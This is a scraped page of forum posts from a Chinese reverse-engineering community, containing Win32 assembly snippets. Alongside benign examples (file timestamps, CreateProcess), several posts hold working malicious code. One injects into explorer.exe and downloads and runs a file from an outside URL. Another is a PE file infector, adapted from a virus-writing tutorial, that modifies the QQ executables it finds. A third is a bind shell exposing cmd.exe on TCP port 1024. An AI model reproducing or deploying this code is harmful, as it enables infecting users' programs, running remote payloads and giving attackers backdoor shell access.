|
[求助]如何获得DLL的未公开函数的参数
代码捏? IDA可以自动识别函数的参数,比如类似: sub_0c = dword ptr 8h sub_1c = dword ptr 04h 这样就表示这个函数有两个参数,windows API按照一定的规范,从右到左,所以,这个函数的原型一般是: 函数字符(char *sub_1c ,char *sub_0c) |
|
WIN 32 汇编编译问题
用Aogo写的MASMPlus就可以编译... |
|
|
|
[求助]注入目标进程并调用其中的函数
.386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include urlmon.inc include shell32.inc includelib kernel32.lib includelib user32.lib includelib urlmon.lib includelib shell32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szURL db 'Http://chenmingzhong87.xinwen365.com/shell.doc',0 szSaveFile db 'C:\shell.doc',0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc push 00403008H call LoadLibrary push 00403013H call LoadLibrary invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW invoke ExitThread,0 ret Shellcode endp start: invoke GetModuleHandle, 0 mov hModule, eax mov edi, eax assume edi:ptr IMAGE_DOS_HEADER add edi, [edi].e_lfanew add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 mov eax, [edi].SizeOfImage mov ShellSize, eax assume edi:NOTHING invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start |
|
[讨论]如何获取文件时间(本地)
.386 .model flat,stdcall option casemap:none include windows.inc include gdi32.inc includelib gdi32.lib include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib .data? szBuffer db 256 dup(?) lpCreationTime FILETIME <?> .const szFileName db 'c:\123.txt',0 szCaption db 'AutoBack',0 szText db '读取文件失败!',0 szDataF db '文件创建的时间是:%d年%d月%d日',0 .code _WinMain proc local @hFile:DWORD local @stUTC:SYSTEMTIME invoke CreateFile,addr szFileName,\ GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0 .if eax == INVALID_HANDLE_VALUE invoke MessageBox,NULL,offset szText,offset szCaption,MB_OK invoke ExitProcess,NULL .elseif mov @hFile,eax invoke GetFileTime,@hFile,addr lpCreationTime,NULL,NULL invoke FileTimeToSystemTime,addr lpCreationTime,addr @stUTC .if eax != NULL ;返回值不为空 movzx eax,@stUTC.wYear ;把时间扩展到32位,并保存 movzx edx,@stUTC.wMonth movzx ecx,@stUTC.wDay invoke wsprintf,addr szBuffer,addr szDataF,eax,edx,ecx invoke MessageBox,NULL,addr szBuffer,offset szCaption,MB_OK invoke ExitProcess,NULL .endif .endif _WinMain endp start: call _WinMain end start |
|
[讨论]学习Billy Belceb病毒编写教程后改写成masm格式
修改了一下老罗的代码: .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib include advapi32.inc includelib advapi32.lib WndProc proto :DWORD, :DWORD, :DWORD, :DWORD AddNewSection proto :DWORD ;很有用的宏: CTEXT MACRO y:VARARG LOCAL sym CONST segment ifidni <y>,<> sym db 0 else sym db y,0 endif CONST ends exitm <offset sym> ENDM .const MAXSIZE equ 260 Head_Len equ sizeof IMAGE_NT_HEADERS + sizeof IMAGE_SECTION_HEADER .data szRegKey db 'SOFTWARE/TENCENT/QQ',0 szKey db 'Install',0 ;键值名称 szStr1 dd REG_SZ ;数据 FileNamePattern db "*.exe",0 ofn OPENFILENAME <> FileNameOfQQ db 256 dup(0) PE_Header IMAGE_NT_HEADERS <0> My_Section IMAGE_SECTION_HEADER <> szDllName db "User32", 0 szMessageBoxA db "MessageBoxA", 0 FileName db 256 dup(0) szFile db 256 dup(0) .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FillFileInfo proc uses edi LOCAL finddata:WIN32_FIND_DATA LOCAL hFindFile:DWORD invoke FindFirstFile,addr szFile,addr finddata .if eax!=INVALID_HANDLE_VALUE mov hFindFile,eax .repeat invoke RtlZeroMemory,addr FileNameOfQQ,sizeof FileNameOfQQ invoke lstrcat,addr FileNameOfQQ,addr FileName lea eax,finddata.cFileName invoke lstrcat,addr FileNameOfQQ,eax call _AddNewSection invoke FindNextFile,hFindFile,addr finddata .until eax == FALSE invoke FindClose,hFindFile .endif ret FillFileInfo endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _QueryKey proc _lpKey LOCAL hKey :DWORD LOCAL BufSize :DWORD invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKey,NULL, KEY_QUERY_VALUE,addr hKey .if eax == ERROR_SUCCESS invoke RegQueryValueEx,hKey,addr szKey,NULL,NULL,addr FileName,addr BufSize .if eax == ERROR_SUCCESS invoke lstrcat,addr szFile,addr FileName invoke lstrcat,addr szFile,addr FileNamePattern invoke RegCloseKey,hKey .endif .endif ret _QueryKey endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> main: call _QueryKey call FillFileInfo invoke ExitProcess,NULL _AddNewSection proc LOCAL hFile: HANDLE LOCAL dwPE_Header_OffSet: DWORD LOCAL dwFileReadWritten: DWORD LOCAL dwMySectionOffSet: DWORD LOCAL dwLastSection_SizeOfRawData: DWORD LOCAL dwLastSection_PointerToRawData: DWORD ;打开文件: invoke CreateFile, addr FileNameOfQQ, GENERIC_READ or GENERIC_WRITE,/ FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL .if eax != INVALID_HANDLE_VALUE mov hFile, eax ;**************************************** ;读取PE文件头: ;**************************************** invoke SetFilePointer, hFile, 3ch, 0, FILE_BEGIN invoke ReadFile, hFile, addr dwPE_Header_OffSet, 4, addr dwFileReadWritten, NULL invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN invoke ReadFile, hFile, addr PE_Header, Head_Len, addr dwFileReadWritten, NULL ;**************************************** ;判断是否有效的PE文件,是的话才继续: ;**************************************** .if [PE_Header.Signature] != IMAGE_NT_SIGNATURE ;如果不是有效的PE文件,就给出提示: invoke CloseHandle,hFile .endif ;**************************************** ;判断是否有足够空间存储新节: ;**************************************** movzx eax, [PE_Header.FileHeader.NumberOfSections] ;得到添加新节前有多少个节: mov ecx, 28h ;28h = sizeof IMAGE_SECTION_HEADER mul ecx ;eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER add eax, dwPE_Header_OffSet ;eax = eax + PE文件头偏移 add eax, 18h ;18h = sizeof IMAGE_FILE_HEADER movzx ecx, [PE_Header.FileHeader.SizeOfOptionalHeader] add eax, ecx ;eax = eax + sizeof IMAGE_OPTIONAL_HEADER add eax, 28h ;添加一个新节的大小 .if eax > [PE_Header.OptionalHeader.SizeOfHeaders] invoke CloseHandle,hFile .endif ;**************************************** ;保存原入口,后面要用到: ;**************************************** mov eax, [PE_Header.OptionalHeader.AddressOfEntryPoint] mov Old_AddressOfEntryPoint, eax mov eax, [PE_Header.OptionalHeader.ImageBase] mov Old_ImageBase, eax ;************************************************** ;计算新节的偏移地址: ;(其实跟上面的“判断是否有足够空间存储新节”基本上一样) ;************************************************** movzx eax, [PE_Header.FileHeader.NumberOfSections] mov ecx, 28h mul ecx ;eax = NumberOfSections * sizeof IMAGE_SECTION_HEADER add eax, 4h ;4h = sizeof "PE/0/0" add eax, dwPE_Header_OffSet add eax, sizeof IMAGE_FILE_HEADER add eax, sizeof IMAGE_OPTIONAL_HEADER mov dwMySectionOffSet, eax ;现在得到了我们的新节的偏移地址 ;**************************************** ;填充我们自己的节的信息: ;(这部分请查看PE格式,很容易明白,不多说了) ;**************************************** mov dword ptr [My_Section.Name1], "MSA." ;名字就叫做“.ASM”吧,呵呵…… mov [My_Section.Misc.VirtualSize], offset vEnd - offset vStart push [PE_Header.OptionalHeader.SizeOfImage] pop [My_Section.VirtualAddress] mov eax, [My_Section.Misc.VirtualSize] mov ecx, [PE_Header.OptionalHeader.FileAlignment] cdq div ecx inc eax mul ecx mov [My_Section.SizeOfRawData], eax ;SizeOfRawData在EXE文件中是对齐到FileAlignMent的整数倍的值 mov eax, dwMySectionOffSet sub eax, 18h ;这个偏移是定位到最后一节的“SizeOfRawData” invoke SetFilePointer, hFile, eax, 0, FILE_BEGIN invoke ReadFile, hFile, addr dwLastSection_SizeOfRawData, 4, addr dwFileReadWritten, NULL invoke ReadFile, hFile, addr dwLastSection_PointerToRawData, 4, addr dwFileReadWritten, NULL ;每个节的 PointerToRawData 等于它的上一节的 SizeOfRawData + PointerToRawData: mov eax, dwLastSection_SizeOfRawData add eax, dwLastSection_PointerToRawData mov [My_Section.PointerToRawData], eax mov [My_Section.PointerToRelocations], 0h mov [My_Section.PointerToLinenumbers], 0h mov [My_Section.NumberOfRelocations], 0h mov [My_Section.NumberOfLinenumbers], 0h mov [My_Section.Characteristics],0E0000020h ;可读可写可执行 ;************************************************** ;重新写入IMAGE_SECTION_HEADER:(包含了新节的信息) ;************************************************** invoke SetFilePointer, hFile, dwMySectionOffSet, 0, FILE_BEGIN invoke WriteFile, hFile, addr My_Section, sizeof IMAGE_SECTION_HEADER, addr dwFileReadWritten, NULL ;**************************************** ;得到 MessageBoxA 的线性地址: ;**************************************** invoke GetModuleHandle, addr szDllName invoke LoadLibrary, addr szDllName invoke GetProcAddress, eax, addr szMessageBoxA mov MessageBoxA_Addr, eax ;**************************************** ;在文件的最后写入我们的新节: ;**************************************** invoke SetFilePointer, hFile, 0, 0, FILE_END push 0 lea eax, dwFileReadWritten push eax push [My_Section.SizeOfRawData] lea eax, vStart push eax push hFile call WriteFile ;************************************************** ;改写IMAGE_NT_HEADERS,使新节可以首先执行: ;(需要改写 SizeOfImage 和 AddressOfEntryPoint) ;************************************************** inc [PE_Header.FileHeader.NumberOfSections] mov eax, [My_Section.Misc.VirtualSize] mov ecx, [PE_Header.OptionalHeader.SectionAlignment] cdq div ecx inc eax mul ecx add eax, [PE_Header.OptionalHeader.SizeOfImage] mov [PE_Header.OptionalHeader.SizeOfImage], eax ;SizeOfImage是一个对齐到SectionAlignment的整数倍的值 mov eax, [My_Section.VirtualAddress] mov [PE_Header.OptionalHeader.AddressOfEntryPoint], eax ;现在的 AddressOfEntryPoint 是指向新节的第一条指令 invoke SetFilePointer, hFile, dwPE_Header_OffSet, 0, FILE_BEGIN invoke WriteFile, hFile, addr PE_Header, sizeof IMAGE_NT_HEADERS, addr dwFileReadWritten, NULL ;**************************************** ;完成!显示成功信息: ;**************************************** invoke CloseHandle,hFile .endif Err_CreateFile_Exit: ret _AddNewSection endp ;**************************************** ;呵呵,我们自己的东东:(像不像病毒?) ;**************************************** vStart: call nStart nStart: pop ebp sub ebp, offset nStart ;得到新节在文件中的实际偏移地址 ;显示对话框: push MB_OK or MB_ICONINFORMATION lea eax, szMyCaption[ebp] push eax lea eax, szMyMsg[ebp] push eax push 0 call MessageBoxA_Addr[ebp] ;恢复原入口地址。当这个节执行完毕后,就回到了原来的文件入口处继续执行: mov eax, Old_ImageBase[ebp] add eax, Old_AddressOfEntryPoint[ebp] push eax ret ;变量定义: MessageBoxA_Addr dd 0 szMyMsg db "看贴不回帖的人木JJ ^_^", 13, 10, 13, 10,/ "by asm",13, 10, "http://www.wolfexp.net",0 szMyCaption db "谁木JJ", 0 Old_ImageBase dd 0 Old_AddressOfEntryPoint dd 0 vEnd: end main |
|
最近学习32位汇编的问题,在线等高手解答。
invoke CompareString,LOCALE_USER_DEFAULT,NORM_IGNORECASE,addr szExplorer,-1,addr stProcess.szExeFile,-1 .if eax==2 忽略大小写 |
|
[求助]关于移动文件指针
搞定,谢谢了. |
|
[求助]刚刚学了WIN32汇编,现在想写一个QQ的自动登录程序
可以抓个包查看QQ的登陆方式,然后用网络编程函数来实现... |
|
请教这段插入进程的代码ASM
又见到楼主? 其实这样的方式是很复杂,不比下面的好: link:/base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szUser32 db 'user32.dll',0 szTitle db "Hello", 0 szText db "Hello, World", 0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc invoke LoadLibrary,addr szUser32 invoke MessageBox, NULL, addr szText, addr szTitle, MB_OK or MB_ICONINFORMATION invoke ExitThread,0 ret Shellcode endp start: ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> invoke GetModuleHandle, 0 ;获取自身模块 mov hModule, eax ;保存句柄 mov edi, eax assume edi:ptr IMAGE_DOS_HEADER ;对应这个结构 add edi, [edi].e_lfanew ;恢复PE头 add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 ;对应这个结构 mov eax, [edi].SizeOfImage ;恢复内存影象尺寸 mov ShellSize, eax ;保存其长度字节,等待写入 assume edi:NOTHING ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start |
|
|
|
[加一篇外传!][添加工具下载!]Windows 核心编程研究系列之二:读取指定物理内存地址中的内容
"很多用No_Share打开的文件,正常情况下不能在其他进程用 CreateFile打开,或者是仅仅用FILE_SHARE_READ打开的 文件不能再以写入目而打开,那么如何绕过windows的这种保护呢?敬请期待。?" 无限期待 这样的突破方式,貌似也可以用在以FILE_MAP_READ的方式MapViewOfFile一个文件,但是却绕过windows对文件共享内存进行写的访问 |
|
[讨论]win32汇编如何实现cmd的输出转向
我就是红狼的asm,经常混邪恶八进制,winker是我在看雪的马甲 这个问题已经解决了: http://forum.eviloctal.com/read-htm-tid-26719.html 原来只是CreateProcess的一个参数问题 |
|
[讨论]win32汇编如何实现cmd的输出转向
谁来回答一下,我OD都看眼花了,源代码: .386P .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include wsock32.inc include Ws2_32.inc includelib user32.lib includelib kernel32.lib includelib wsock32.lib includelib Ws2_32.lib TCP_PORT equ 1024 ;常量定义 .data szCommand db 'cmd.exe',0 .data? hScoket SOCKET ? hScoketOther SOCKET ? szBuffer db MAX_PATH dup(?) dwSize DWORD ? .code _ProcessMain proc local @wsaData:WSADATA local @hScoket:SOCKET local @stAddr:sockaddr_in local stStartUp:STARTUPINFO local stProcInfo:PROCESS_INFORMATION invoke WSAStartup,0202H,addr @wsaData ;初始化WSAStartup库 mov @stAddr.sin_family,AF_INET ;设置IP格式 invoke htons,TCP_PORT ;设置端口 mov @stAddr.sin_port,ax ;保存 mov @stAddr.sin_addr,INADDR_ANY ;设置IP地址 invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字 mov hScoket,eax ;保存句柄 invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in ;绑定 .if eax == SOCKET_ERROR mov eax,FALSE ret .endif invoke listen,hScoket,5 ;开始监听,默认连接5个 invoke accept,hScoket,NULL,NULL ;如果有客户端连接,马上确定 .if eax == INVALID_SOCKET mov eax,FALSE ret .endif mov hScoketOther,eax invoke GetStartupInfo,addr stStartUp mov ebx,hScoketOther mov stStartUp.hStdInput,ebx ;为STARTUPINFO的结构成员赋值,这个值是accept()返回的句柄 mov stStartUp.hStdOutput,ebx mov stStartUp.hStdError,ebx mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES mov stStartUp.wShowWindow,SW_HIDE mov stStartUp.wShowWindow,SW_SHOWNORMAL invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\ NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ;将结果载入并执行cmd ret _ProcessMain endp start: invoke _ProcessMain invoke ExitProcess,NULL end start |
|
[求助]关于插入进程中编译错误提示
我好好看一下这个宏 |
|
怎么用汇编调用CreateProcessA函数?
.386 .model flat,stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc includelib kernel32.lib includelib user32.lib .data szFileName db 'C:\windows\system32\ping.exe',0 szCmdLine db 'ping www.163.com',0 .data? stStartUp STARTUPINFO <?> stProcInfo PROCESS_INFORMATION <?> .code start: invoke GetStartupInfo,addr stStartUp invoke CreateProcess,addr szFileName,addr szCmdLine,NULL,NULL,NULL,\ NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo invoke ExitProcess,NULL end start |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值